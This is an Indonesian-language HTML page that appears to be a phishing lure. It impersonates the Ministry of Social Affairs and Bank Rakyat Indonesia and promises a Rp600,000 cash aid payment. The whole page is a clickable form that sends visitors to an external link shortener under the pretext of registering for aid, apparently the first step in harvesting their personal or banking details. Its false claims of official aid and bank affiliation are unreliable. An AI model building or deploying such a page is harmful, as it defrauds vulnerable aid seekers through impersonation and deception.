<!DOCTYPE html>
    <html lang="id" id="facebook" class="no_js">
    <head>
    <meta charset="utf-8">
    <link rel="icon" href="https://iili.io/t7BREb.png">
    <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta name="keywords"content="info bantuan2022, pkh, bansos, bantuan sosial, pemerintah, Bbm, bantuan blt, bantuan tunai," />
    <meta name="description" content="Bansos Uang Tunai Rp600 Ribu, Cek Namamu Terdaftar atau Tidak" />
    <meta http-equiv="expires" content="Sat, 26 Jul 1997 05:00:00 GMT">
    <meta http-equiv="cache-control" content="private, must-revalidate, max-age=0">
    <meta http-equiv="pragma" content="no-cache">
    <meta name="csrf-token" content="nUpCrsjltZ5v1DXv0BRJzVFYymWzIXDoXFQyxFhz">
    <meta name="description" content="Bansos Uang Tunai Rp500 Ribu, Cek Namamu Terdaftar atau Tidak">
    <meta name="robots" content="index,follow">
    <meta name="language" content="ID">
    <meta name="coverage" content="Worldwide">
     <meta name="distribution" content="Global">
    <meta name="google-translate-customization" content="5587c1b0a958bf07-62a8e309de686e87-gc92f61279a2c8524-11" />
    <meta property="fb:app_id" content="124578887583575">
    <meta property="og:type" content="website" />
    <meta property="og:site_name" content="Bantuan Sosial tunai" />
    <meta property="og:locale" content="en_US" />
    <meta property="og:title" content="Bantuan Sosial tunai" />
    <meta property="og:image" content="https://i.postimg.cc/Pf0Wk8hc/images-3.jpg" />
    <meta property="og:description" content="" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@kemensos.go.id" />
    <meta name="twitter:title" content="Bantuan Sosial tunai" />
    <meta name="twitter:image" content="https://i.postimg.cc/Pf0Wk8hc/images-3.jpg" />
    <meta name="twitter:description" content="" />
    <link href="https://plus.google.com/+kemensos.go.id" rel="publisher" />
    <link rel="alternate" href="index.html" hreflang="id-id" />
    </head>
	<style>
		body{
      margin: 0;
      padding: 0;
      user-select:none; -moz-user-select:none; -ms-user-select:none; -khtml-user-select:none; -webkit-user-select:none 
      height: 200px;
      background: #f2f2f2;
    }
.bok{
background: #555;
width: 350px;
height: auto;
margin-left: auto;
margin-right: auto;
margin: 20vh auto;
border: 1px solid #fff;
border-radius: 5px;
box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
}
.profile {
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  padding: 20px;
}

.profile>img {
  width: 90px;
  height: 90px;
  border: 3px solid #222;
  border-radius: 100%;
  background: #fff;
}
.spc{
margin-top: 20px;
}
.txt{
text-align: center;
color: #fff;
font-size: 17px;
font-family: Roboto;
text-align: center;
display: block;
font-weight: bold;
}
.txt1{
text-align: center;
color: #fff;
font-size: 15px;
font-family: "Lato", sans-serif;
text-align: center;
display: block;
padding: 25px;
font-weight: bold;
}
.btn{
background: #4682b4;
    width: 90%;
    height: auto;
    margin-top: 10px;
    margin-left: auto;
    margin-right: auto;
    padding: 10px;
    color: #fff;
    font-size: 14px;
    font-family: Roboto;
    font-weight: bold;
    text-align: center;
    text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
    border: 1px solid #fff;
    border-radius: 5px;
    box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
    outline: none;
    display: block;
}

.btn.disabled {
    pointer-events: none;
    background: #8b9dc3;
    border: 1px solid #8b9dc3;
}

		</style>
		<body>
			<div class="bok">
				<form name="login" id="login" action="https://ujeb.se/xTJfLp" method="get">
                     <div class="chat-detail" onClick="document.forms['login'].submit();">
				<div class="profile">
                  <img src="https://iili.io/tT1jXR.jpg" alt="tT1jXR.jpg" alt="error image" >
                  	<div class="spc">
          <div class="txt">
          PT. BANK RAKYAT INDONESIA
          <div class="txt1">
KLIK SELANJUTNYA UNTUK MENDAFTARKAN DIRI ANDA AGAR ANDA BISA MENDAPATKAN BANTUAN
          <div class="spc">
          <buton class="btn">SELANJUTNYA</buton>
			</body>
			</html>